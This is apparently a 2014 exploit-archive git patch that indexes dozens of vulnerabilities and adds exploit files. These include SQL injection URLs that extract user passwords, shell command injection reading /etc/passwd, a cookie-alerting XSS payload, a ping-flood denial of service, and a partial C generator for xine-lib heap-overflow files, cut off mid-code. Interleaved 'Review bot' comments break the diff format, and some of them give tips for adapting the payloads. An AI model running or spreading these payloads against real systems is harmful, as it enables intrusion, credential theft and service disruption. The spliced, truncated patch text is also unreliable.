From b702913b4109b2834c9dcf87346d6a018df4e97b Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Sat, 8 Feb 2014 04:27:41 +0000 Subject: [PATCH] Updated 02_08_2014 --- files.csv | 62 +++++ platforms/asp/webapps/31463.txt | 9 + platforms/cgi/webapps/31466.txt | 11 + platforms/hardware/dos/31478.txt | 9 + platforms/jsp/webapps/31475.txt | 9 + platforms/linux/remote/31462.c | 375 ++++++++++++++++++++++++++++++ platforms/linux/remote/31518.rb | 113 +++++++++ platforms/multiple/dos/31477.txt | 9 + platforms/osx/remote/31473.html | 9 + platforms/php/remote/31479.txt | 9 + platforms/php/webapps/31424.txt | 27 +++ platforms/php/webapps/31458.txt | 35 +++ platforms/php/webapps/31459.txt | 24 ++ platforms/php/webapps/31467.txt | 9 + platforms/php/webapps/31468.txt | 14 ++ platforms/php/webapps/31469.txt | 9 + platforms/php/webapps/31470.txt | 9 + platforms/php/webapps/31471.txt | 7 + platforms/php/webapps/31472.txt | 7 + platforms/php/webapps/31476.txt | 8 + platforms/php/webapps/31480.txt | 9 + platforms/php/webapps/31481.txt | 9 + platforms/php/webapps/31482.txt | 9 + platforms/php/webapps/31483.txt | 9 + platforms/php/webapps/31484.txt | 9 + platforms/php/webapps/31485.txt | 9 + platforms/php/webapps/31486.txt | 9 + platforms/php/webapps/31487.txt | 9 + platforms/php/webapps/31488.txt | 9 + platforms/php/webapps/31489.txt | 9 + platforms/php/webapps/31490.txt | 9 + platforms/php/webapps/31491.txt | 9 + platforms/php/webapps/31492.txt | 9 + platforms/php/webapps/31493.txt | 9 + platforms/php/webapps/31494.txt | 9 + platforms/php/webapps/31495.txt | 9 + platforms/php/webapps/31496.txt | 9 + platforms/php/webapps/31497.txt | 9 + platforms/php/webapps/31498.txt | 9 + platforms/php/webapps/31499.txt | 9 + platforms/php/webapps/31500.txt | 9 + platforms/php/webapps/31501.txt | 9 + platforms/php/webapps/31502.txt | 9 + platforms/php/webapps/31503.txt | 9 + platforms/php/webapps/31504.txt | 9 + platforms/php/webapps/31505.txt | 9 + platforms/php/webapps/31506.txt | 9 + platforms/php/webapps/31507.txt | 9 + platforms/php/webapps/31508.txt | 9 + 
platforms/php/webapps/31509.txt | 9 + platforms/php/webapps/31510.txt | 9 + platforms/php/webapps/31511.txt | 9 + platforms/php/webapps/31512.txt | 9 + platforms/php/webapps/31513.txt | 9 + platforms/php/webapps/31514.txt | 9 + platforms/php/webapps/31516.txt | 74 ++++++ platforms/php/webapps/31517.txt | 35 +++ platforms/windows/dos/31461.txt | 189 +++++++++++++++ platforms/windows/dos/31464.pl | 34 +++ platforms/windows/local/31386.rb | 127 ++++++++++ platforms/windows/local/31460.txt | 65 ++++++ platforms/windows/remote/31465.cs | 18 ++ platforms/windows/remote/31474.py | 44 ++++ 63 files changed, 1665 insertions(+) create mode 100755 platforms/asp/webapps/31463.txt create mode 100755 platforms/cgi/webapps/31466.txt create mode 100755 platforms/hardware/dos/31478.txt create mode 100755 platforms/jsp/webapps/31475.txt create mode 100755 platforms/linux/remote/31462.c create mode 100755 platforms/linux/remote/31518.rb create mode 100755 platforms/multiple/dos/31477.txt create mode 100755 platforms/osx/remote/31473.html create mode 100755 platforms/php/remote/31479.txt create mode 100755 platforms/php/webapps/31424.txt create mode 100755 platforms/php/webapps/31458.txt create mode 100755 platforms/php/webapps/31459.txt create mode 100755 platforms/php/webapps/31467.txt create mode 100755 platforms/php/webapps/31468.txt create mode 100755 platforms/php/webapps/31469.txt create mode 100755 platforms/php/webapps/31470.txt create mode 100755 platforms/php/webapps/31471.txt create mode 100755 platforms/php/webapps/31472.txt create mode 100755 platforms/php/webapps/31476.txt create mode 100755 platforms/php/webapps/31480.txt create mode 100755 platforms/php/webapps/31481.txt create mode 100755 platforms/php/webapps/31482.txt create mode 100755 platforms/php/webapps/31483.txt create mode 100755 platforms/php/webapps/31484.txt create mode 100755 platforms/php/webapps/31485.txt create mode 100755 platforms/php/webapps/31486.txt create mode 100755 
platforms/php/webapps/31487.txt create mode 100755 platforms/php/webapps/31488.txt create mode 100755 platforms/php/webapps/31489.txt create mode 100755 platforms/php/webapps/31490.txt create mode 100755 platforms/php/webapps/31491.txt create mode 100755 platforms/php/webapps/31492.txt create mode 100755 platforms/php/webapps/31493.txt create mode 100755 platforms/php/webapps/31494.txt create mode 100755 platforms/php/webapps/31495.txt create mode 100755 platforms/php/webapps/31496.txt create mode 100755 platforms/php/webapps/31497.txt create mode 100755 platforms/php/webapps/31498.txt create mode 100755 platforms/php/webapps/31499.txt create mode 100755 platforms/php/webapps/31500.txt create mode 100755 platforms/php/webapps/31501.txt create mode 100755 platforms/php/webapps/31502.txt create mode 100755 platforms/php/webapps/31503.txt create mode 100755 platforms/php/webapps/31504.txt create mode 100755 platforms/php/webapps/31505.txt create mode 100755 platforms/php/webapps/31506.txt create mode 100755 platforms/php/webapps/31507.txt create mode 100755 platforms/php/webapps/31508.txt create mode 100755 platforms/php/webapps/31509.txt create mode 100755 platforms/php/webapps/31510.txt create mode 100755 platforms/php/webapps/31511.txt create mode 100755 platforms/php/webapps/31512.txt create mode 100755 platforms/php/webapps/31513.txt create mode 100755 platforms/php/webapps/31514.txt create mode 100755 platforms/php/webapps/31516.txt create mode 100755 platforms/php/webapps/31517.txt create mode 100755 platforms/windows/dos/31461.txt create mode 100755 platforms/windows/dos/31464.pl create mode 100755 platforms/windows/local/31386.rb create mode 100755 platforms/windows/local/31460.txt create mode 100755 platforms/windows/remote/31465.cs create mode 100755 platforms/windows/remote/31474.py diff --git a/files.csv b/files.csv index 907003701..197f31675 100755 --- a/files.csv +++ b/files.csv 
@@ -28195,6 +28195,7 @@ id,file,description,date,author,platform,type,port
 31382,platforms/php/webapps/31382.txt,"Joomla! and Mambo 'ensenanzas' Component 'id' Parameter SQL Injection Vulnerability",2008-03-11,The-0utl4w,php,webapps,0
 31383,platforms/php/webapps/31383.txt,"PHP-Nuke NukeC30 3.0 Module 'id_catg' Parameter SQL Injection Vulnerability",2008-03-11,Houssamix,php,webapps,0
 31384,platforms/php/webapps/31384.txt,"PHP-Nuke zClassifieds Module 'cat' Parameter SQL Injection Vulnerability",2008-03-11,Lovebug,php,webapps,0
+31386,platforms/windows/local/31386.rb,"Adrenalin Player 2.2.5.3 (.m3u) - SEH Buffer Overflow ASLR+DEP Bypass",2014-02-04,"Muhamad Fadzil Ramli",windows,local,0
 31387,platforms/php/webapps/31387.txt,"Uberghey CMS 0.3.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
 31388,platforms/php/webapps/31388.txt,"Travelsized CMS 0.4.1 'index.php' Multiple Local File Include Vulnerabilities",2008-03-12,muuratsalo,php,webapps,0
 31389,platforms/php/webapps/31389.txt,"Chris LaPointe Download Center 1.2 login Action Multiple Parameter XSS",2008-03-12,ZoRLu,php,webapps,0
@@ -28227,6 +28228,7 @@ id,file,description,date,author,platform,type,port
 31419,platforms/php/webapps/31419.txt,"TopicsViewer 3.0 Beta 1 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31420,platforms/php/webapps/31420.txt,"Eventy Online Scheduler 1.8 - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
 31421,platforms/php/webapps/31421.txt,"Booking Calendar - Multiple Vulnerabilities",2014-02-05,"AtT4CKxT3rR0r1ST ",php,webapps,80
+31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitry File Upload",2014-02-05,TheBlackMonster,php,webapps,80
 31425,platforms/hardware/webapps/31425.txt,"D-Link DIR-100 - Multiple Vulnerabilities",2014-02-05,"Felix Richter",hardware,webapps,80
 31426,platforms/php/webapps/31426.txt,"Plogger 1.0 (RC1) - Multiple Vulnerabilities",2014-02-05,killall-9,php,webapps,80
 31427,platforms/php/webapps/31427.txt,"ownCloud 6.0.0a - Multiple Vulnerabilities",2014-02-05,absane,php,webapps,80
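Review bot: The new 31424 row's description reads "Arbitry File Upload"; the misspelling will defeat anyone searching the index for "Arbitrary". The row should read `+31424,platforms/php/webapps/31424.txt,"Wordpress Dandelion Theme - Arbitrary File Upload",2014-02-05,TheBlackMonster,php,webapps,80`.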
@@ -28258,3 +28260,63 @@ id,file,description,date,author,platform,type,port
 31455,platforms/php/webapps/31455.txt,"W-Agora 4.0 mail_users.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
 31456,platforms/php/webapps/31456.txt,"W-Agora 4.0 moderate_notes.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
 31457,platforms/php/webapps/31457.txt,"W-Agora 4.0 reorder_forums.php bn_dir_default Parameter Remote File Inclusion",2008-03-20,ZoRLu,php,webapps,0
+31458,platforms/php/webapps/31458.txt,"PHP Webcam Video Conference - Multiple Vulnerabilities",2014-02-06,vinicius777,php,webapps,80
+31459,platforms/php/webapps/31459.txt,"Joomla 3.2.1 - SQL Injection Vulnerability",2014-02-06,killall-9,php,webapps,80
+31460,platforms/windows/local/31460.txt,"Asseco SEE iBank FX Client 2.0.9.3 - Local Privilege Escalation Vulnerability",2014-02-06,LiquidWorm,windows,local,0
+31461,platforms/windows/dos/31461.txt,"Publish-It 3.6d - Buffer Overflow Vulnerability",2014-02-06,"Core Security",windows,dos,0
+31462,platforms/linux/remote/31462.c,"xine-lib Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
+31463,platforms/asp/webapps/31463.txt,"Iatek Knowledge Base 'content_by_cat.asp' SQL Injection Vulnerability",2008-03-20,xcorpitx,asp,webapps,0
+31464,platforms/windows/dos/31464.pl,"SurgeMail 3.8 IMAP LSUB Command Remote Stack Buffer Overflow Vulnerability",2008-03-21,"Leon Juranic",windows,dos,0
+31465,platforms/windows/remote/31465.cs,"DotNetNuke 4.8.1 Default 'ValidationKey' and 'DecriptionKey' Weak Encryption Vulnerability",2008-03-21,"Brian Holyfield",windows,remote,0
+31466,platforms/cgi/webapps/31466.txt,"Webutil 2.3/2.7 'webutil.pl' Multiple Remote Command Execution Vulnerabilities",2008-03-21,"Zero X",cgi,webapps,0
+31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 'setup.php3' Cross-Site Scripting Vulnerability",2008-03-22,ZoRLu,php,webapps,0
+31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0
+31469,platforms/php/webapps/31469.txt,"ooComments 1.0 classes/class_admin.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
+31470,platforms/php/webapps/31470.txt,"ooComments 1.0 classes/class_comments.php PathToComment Parameter Remote File Inclusion",2008-03-22,ZoRLu,php,webapps,0
+31471,platforms/php/webapps/31471.txt,"TinyPortal 0.8.6/1.0.3 'index.php' Cross-Site Scripting Vulnerability",2008-03-22,Y433r,php,webapps,0
+31472,platforms/php/webapps/31472.txt,"cPanel 11.18.3/11.21 'manpage.html' Cross-Site Scripting Vulnerability",2008-03-22,Linux_Drox,php,webapps,0
+31473,platforms/osx/remote/31473.html,"Apple Safari 3.1 Window.setTimeout Variant Content Spoofing Vulnerability",2008-03-22,"Juan Pablo Lopez Yacubian",osx,remote,0
+31474,platforms/windows/remote/31474.py,"Mitsubishi Electric GB-50A Multiple Remote Authentication Bypass Vulnerabilities",2008-03-22,"Chris Withers",windows,remote,0
+31475,platforms/jsp/webapps/31475.txt,"Alkacon OpenCms 7.0.3 'users_list.jsp' Multiple Cross-Site Scripting Vulnerabilities",2008-03-24,nnposter,jsp,webapps,0
+31476,platforms/php/webapps/31476.txt,"Efestech E-Kontor 'id' Parameter SQL Injection Vulnerability",2008-03-24,RMx,php,webapps,0
+31477,platforms/multiple/dos/31477.txt,"snircd 1.3.4 And ircu 2.10.12.12 'set_user_mode' Remote Denial of Service Vulnerability",2008-03-24,"Chris Porter",multiple,dos,0
+31478,platforms/hardware/dos/31478.txt,"Linksys SPA-2102 Phone Adapter Packet Handling Denial of Service Vulnerability",2008-03-24,sipherr,hardware,dos,0
+31479,platforms/php/remote/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,remote,0
+31480,platforms/php/webapps/31480.txt,"Quick Classifieds 1.0 locate.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31481,platforms/php/webapps/31481.txt,"Quick Classifieds 1.0 search_results.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31482,platforms/php/webapps/31482.txt,"Quick Classifieds 1.0 classifieds/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31483,platforms/php/webapps/31483.txt,"Quick Classifieds 1.0 classifieds/view.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31484,platforms/php/webapps/31484.txt,"Quick Classifieds 1.0 controlcenter/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31485,platforms/php/webapps/31485.txt,"Quick Classifieds 1.0 controlcenter/manager.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31486,platforms/php/webapps/31486.txt,"Quick Classifieds 1.0 controlcenter/pass.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31487,platforms/php/webapps/31487.txt,"Quick Classifieds 1.0 controlcenter/remember.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31488,platforms/php/webapps/31488.txt,"Quick Classifieds 1.0 controlcenter/sign-up.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31489,platforms/php/webapps/31489.txt,"Quick Classifieds 1.0 controlcenter/update.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31490,platforms/php/webapps/31490.txt,"Quick Classifieds 1.0 controlcenter/userSet.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31491,platforms/php/webapps/31491.txt,"Quick Classifieds 1.0 controlcenter/verify.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31492,platforms/php/webapps/31492.txt,"Quick Classifieds 1.0 controlpannel/alterCats.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31493,platforms/php/webapps/31493.txt,"Quick Classifieds 1.0 controlpannel/alterFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31494,platforms/php/webapps/31494.txt,"Quick Classifieds 1.0 controlpannel/alterHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31495,platforms/php/webapps/31495.txt,"Quick Classifieds 1.0 controlpannel/alterNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31496,platforms/php/webapps/31496.txt,"Quick Classifieds 1.0 controlpannel/alterTheme.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31497,platforms/php/webapps/31497.txt,"Quick Classifieds 1.0 controlpannel/color_help.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31498,platforms/php/webapps/31498.txt,"Quick Classifieds 1.0 controlpannel/createdb.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31499,platforms/php/webapps/31499.txt,"Quick Classifieds 1.0 controlpannel/createFeatured.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31500,platforms/php/webapps/31500.txt,"Quick Classifieds 1.0 controlpannel/createHomepage.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31501,platforms/php/webapps/31501.txt,"Quick Classifieds 1.0 controlpannel/createL.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31502,platforms/php/webapps/31502.txt,"Quick Classifieds 1.0 controlpannel/createM.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31503,platforms/php/webapps/31503.txt,"Quick Classifieds 1.0 controlpannel/createNews.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31504,platforms/php/webapps/31504.txt,"Quick Classifieds 1.0 controlpannel/createP.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31505,platforms/php/webapps/31505.txt,"Quick Classifieds 1.0 controlpannel/createS.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31506,platforms/php/webapps/31506.txt,"Quick Classifieds 1.0 controlpannel/createT.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31507,platforms/php/webapps/31507.txt,"Quick Classifieds 1.0 controlpannel/index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31508,platforms/php/webapps/31508.txt,"Quick Classifieds 1.0 controlpannel/mailadmin.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31509,platforms/php/webapps/31509.txt,"Quick Classifieds 1.0 controlpannel/setUp.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31510,platforms/php/webapps/31510.txt,"Quick Classifieds 1.0 include/sendit.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31511,platforms/php/webapps/31511.txt,"Quick Classifieds 1.0 include/sendit2.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31512,platforms/php/webapps/31512.txt,"Quick Classifieds 1.0 include/adminHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31513,platforms/php/webapps/31513.txt,"Quick Classifieds 1.0 include/usersHead.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31514,platforms/php/webapps/31514.txt,"Quick Classifieds 1.0 style/default.scheme.inc DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31516,platforms/php/webapps/31516.txt,"Serendipity 1.7.5 (Backend) - Multiple Vulnerabilities",2014-02-07,"Stefan Schurtz",php,webapps,80
+31517,platforms/php/webapps/31517.txt,"CTERA 3.2.29.0 and 3.2.42.0 - Stored XSS",2014-02-07,"Luigi Vezzoso",php,webapps,80
+31518,platforms/linux/remote/31518.rb,"Pandora FMS Remote Code Execution",2014-02-07,metasploit,linux,remote,8023
diff --git a/platforms/asp/webapps/31463.txt b/platforms/asp/webapps/31463.txt
new file mode 100755
index 000000000..375b72027
--- /dev/null
+++ b/platforms/asp/webapps/31463.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28376/info
+
+Iatek Knowledge Base is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/content_by_cat.asp?contentid=99999999&catid=-99887766+UNION+SELECT+0,null,password,3,accesslevel,5,null,7,null,user_name+from+users
+
+http://www.example.com/content_by_cat.asp?contentid=-99999999&catid=-99887766+union+select+0,null,password,3,accesslevel,5,null,7,8,user_name+from+users
\ No newline at end of file
diff --git a/platforms/cgi/webapps/31466.txt b/platforms/cgi/webapps/31466.txt
new file mode 100755
index 000000000..66c32ceed
--- /dev/null
+++ b/platforms/cgi/webapps/31466.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/28393/info
+
+Webutil is prone to multiple vulnerabilities that attackers can leverage to execute arbitrary commands. These issues occur because the application fails to adequately sanitize user-supplied input.
+
+Successful attacks can compromise the affected application and possibly the underlying computer.
+
+These issues affect Webutil 2.3 and 2.7.
+
+http://www.example.com/cgi-bin/webutil.pl?details&|cat$IFS/etc/passwd
+http://www.example.com/cgi-bin/webutil.pl?dig&|cat$IFS/etc/passwd
+http://www.example.com/cgi-bin/webutil.pl?whois&|cat$IFS/etc/passwd
\ No newline at end of file
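Review bot: Row 31479 files the Quick Classifieds index.php3 RFI under `platforms/php/remote/` with type `remote`, while its thirty-five sibling rows 31480–31514 — same product, author, date and vulnerability class — are under `platforms/php/webapps/` with type `webapps`, which looks like a misclassification that will split the series in any search filtered by type. Unless the remote classification is deliberate, the row should read `+31479,platforms/php/webapps/31479.txt,"Quick Classifieds 1.0 index.php3 DOCUMENT_ROOT Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0` with the file moved to match. Row 31465's 'DecriptionKey' also looks like a typo for DotNetNuke's `DecryptionKey` setting, though it may have been carried over verbatim from the original advisory title.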
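Review bot: The advisory never states which Iatek Knowledge Base version was tested, unlike the other SecurityFocus-sourced entries in this batch, which each carry an "X is vulnerable; other versions may also be affected" line, and the files.csv row carries no version either. A line such as `Iatek Knowledge Base [version tested] is vulnerable; other versions may also be affected.` after the impact paragraph would make the entry usable for triage. The two UNION payloads both select ten columns and differ only in the sign of `contentid` and `null` versus `8` in the ninth column, so a sentence saying that the second is presumably the variant for when the first fails on column typing would help anyone reusing them.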
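Review bot: The PoC URLs inject through the unnamed first query-string parameter (`?details&|cat$IFS/etc/passwd`), and the use of `$IFS` instead of a literal space suggests the value reaches a shell where spaces are stripped or rejected; the advisory text does not say so, and a reader adapting the payload with a normal space would conclude the host is patched. A line after "These issues affect Webutil 2.3 and 2.7." would close that gap: `The query string is passed to a shell; spaces appear to be filtered, hence $IFS as the separator after the pipe.` It would also be worth stating that the three URLs hit the same sink via the details, dig and whois actions rather than three independent bugs, if that is what the source confirms.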
diff --git a/platforms/hardware/dos/31478.txt b/platforms/hardware/dos/31478.txt
new file mode 100755
index 000000000..e20b4f716
--- /dev/null
+++ b/platforms/hardware/dos/31478.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28414/info
+
+Linksys SPA-2102 Phone Adapter is prone to a denial-of-service vulnerability when handling multiple packets in quick succession.
+
+Attackers can exploit this issue to deny access to the device's control center for legitimate users. Reports indicate that this issue is exploitable only via computers on the same LAN as the device.
+
+Linksys SPA-2102 Phone Adapter running firmware 3.3.6 is vulnerable; other versions may also be affected.
+
+ping -l 65500 192.168.0.1
\ No newline at end of file
diff --git a/platforms/jsp/webapps/31475.txt b/platforms/jsp/webapps/31475.txt
new file mode 100755
index 000000000..b120df21b
--- /dev/null
+++ b/platforms/jsp/webapps/31475.txt
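Review bot: `ping -l 65500 192.168.0.1` is Windows ping syntax, where `-l` sets the payload size; on Linux and BSD `-l` means preload N packets (root only) and the size flag is `-s`, so the PoC as written either errors out or does something quite different on a non-Windows host. A one-line note above the command would prevent that: `# Windows ping syntax (-l = payload size); on Linux use: ping -s 65500 192.168.0.1`. The address is a common default LAN address and should be marked as a placeholder for the adapter's actual IP, consistent with the `www.example.com` convention used by the other advisories in this commit.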
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/28411/info
+
+Alkacon OpenCms is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+OpenCms 7.0.3 is vulnerable; other versions may also be affected.
+
+http://www.example.com/opencms/system/workplace/admin/accounts/users_list.jsp?ispopup=&action=listsearch&framename=&title=&closelink=%252Fopencms%252Fopencms%252Fsystem%252Fworkplace%252Fviews%252Fadmin%252Fadmin-main.jsp%253Faction%253Dinitial%2526path%253D%252Faccounts%252Forgunit&preactiondone=&dialogtype=&message=&resource=&listaction=&base=&selitems=&formname=lsu-form&sortcol=&oufqn=&originalparams=&page=&style=new&root=&path=%252Faccounts%252Forgunit%252Fusers&redirect=&searchfilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E&listSearchFilter=%3C%2Fscript%3E%3Ciframe+onload%3Dalert%28document.cookie%29%3E%3Cscript%3E
\ No newline at end of file
diff --git a/platforms/linux/remote/31462.c b/platforms/linux/remote/31462.c
new file mode 100755
index 000000000..beb40945f
--- /dev/null
+++ b/platforms/linux/remote/31462.c
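Review bot: The vector targets `/system/workplace/admin/accounts/users_list.jsp`, a page under the OpenCms workplace admin tree, so the reflected payload presumably only fires for a victim who already holds a workplace session; the advisory never states the privilege required, which is exactly what decides whether "steal cookie-based authentication credentials" means an admin session. Suggest adding after the version line: `The affected page lives in the workplace admin area; exploitation requires luring an already authenticated workplace user to the URL.` The payload is injected into both `searchfilter` and `listSearchFilter`; if only one of them is actually reflected, naming it would save the next reader from guessing.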
@@ -0,0 +1,375 @@ +source: http://www.securityfocus.com/bid/28370/info + +The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. + +Attackers can exploit these issues to execute arbitrary code in the context of applications that use the library. Failed attacks will cause denial-of-service conditions. + +These issues affect xine-lib 1.1.11; other versions may also be affected. + +/* + +by Luigi Auriemma + +*/ + +#include +#include +#include +#include + +typedef uint8_t u8; +typedef uint16_t u16; +typedef uint32_t u32; +typedef int64_t i64; +typedef uint64_t u64; + + + +#define VER "0.1" +#define BUFFSZ 0xffff + + + +#define BE_FOURCC( ch0, ch1, ch2, ch3 ) \ + ( (uint32_t)(unsigned char)(ch3) | \ + ( (uint32_t)(unsigned char)(ch2) << 8 ) | \ + ( (uint32_t)(unsigned char)(ch1) << 16 ) | \ + ( (uint32_t)(unsigned char)(ch0) << 24 ) ) +#define FLV_FLAG_HAS_VIDEO 0x01 +#define FLV_FLAG_HAS_AUDIO 0x04 +#define FLV_TAG_TYPE_SCRIPT 0x12 +#define FLV_DATA_TYPE_NUMBER 0x00 +#define FLV_DATA_TYPE_OBJECT 0x03 +#define FLV_DATA_TYPE_ENDOBJECT 0x09 +#define FLV_DATA_TYPE_ARRAY 0x0a +#define MOOV_ATOM BE_FOURCC('m', 'o', 'o', 'v') +#define RMRA_ATOM BE_FOURCC('r', 'm', 'r', 'a') +#define RDRF_ATOM BE_FOURCC('r', 'd', 'r', 'f') +#define RMF_TAG BE_FOURCC('.', 'R', 'M', 'F') +#define PROP_TAG BE_FOURCC('P', 'R', 'O', 'P') +#define MDPR_TAG BE_FOURCC('M', 'D', 'P', 'R') +#define DATA_TAG BE_FOURCC('D', 'A', 'T', 'A') +#define INDX_TAG BE_FOURCC('I', 'N', 'D', 'X') +#define VIDO_TAG BE_FOURCC('V', 'I', 'D', 'O') +#define DATA_CHUNK_HEADER_SIZE 10 +#define FORM_TAG BE_FOURCC('F', 'O', 'R', 'M') +#define MOVE_TAG BE_FOURCC('M', 'O', 'V', 'E') +#define PC_TAG BE_FOURCC('_', 'P', 'C', '_') +#define PALT_TAG BE_FOURCC('P', 'A', 'L', 'T') +#define PALETTE_SIZE 256 +#define PALETTE_CHUNK_SIZE (PALETTE_SIZE * 3) +#define EBML_ID_EBML 0x1A45DFA3 +#define EBML_ID_DOCTYPE 0x4282 +#define 
GST_EBML_SIZE_UNKNOWN 0x00ffffffffffffffULL +#define GST_EBML_ID_VOID 0xEC +#define FILM_TAG BE_FOURCC('F', 'I', 'L', 'M') +#define STAB_TAG BE_FOURCC('S', 'T', 'A', 'B') + + + +int gst_ebml_write_element_id(u8 *data, u32 id); // from Gstreamer +int gst_ebml_write_element_size(u8 *data, i64 size); // from Gstreamer +int putcc(u8 *data, int chr, int len); +int putss(u8 *data, u8 *str); +int putxb(u8 *data, u64 num, int bits); +int putxi(u8 *data, u64 num, int bits); +void std_err(void); + + + +int main(int argc, char *argv[]) { + FILE *fd; + int i, + attack; + u8 *buff, + *fname, + *psize, + *p; + + setbuf(stdout, NULL); + + fputs("\n" + "xine-lib <= 1.1.11 multiple heap overflows "VER"\n" + "by Luigi Auriemma\n" + "e-mail: aluigi@autistici.org\n" + "web: aluigi.org\n" + "\n", stdout); + + if(argc < 3) { + printf("\n" + "Usage: %s \n" + "\n" + "Attacks:\n" + " 1 = heap overflow in demux_flv (file.FLV)\n" + " 2 = heap overflow in demux_qt (file.MOV)\n" + " 3 = heap overflow in demux_real (file.RM)\n" + " 4 = heap overflow in demux_wc3movie (file.MVE)\n" + " 5 = heap overflow in ebml.c (file.MKV)\n" + " 6 = heap overflow in demux_film.c (file.CAK)\n" + "\n", argv[0]); + exit(1); + } + + attack = atoi(argv[1]); + fname = argv[2]; + + buff = malloc(BUFFSZ); + if(!buff) std_err(); + + p = buff; + if(attack == 1) { + p += putss(p, "FLV\x01"); + *p++ = FLV_FLAG_HAS_VIDEO | FLV_FLAG_HAS_AUDIO; + p += putxb(p, 9, 32); + p += putxb(p, 0, 32); + p += putxb(p, FLV_TAG_TYPE_SCRIPT, 8); // tag_type + psize = p; p += 3; + p += putxb(p, 0, 32); // pts + p += putxb(p, 0, 24); + p += putxb(p, FLV_DATA_TYPE_OBJECT, 8); + p += putxb(p, 13, 16); + p += putss(p, 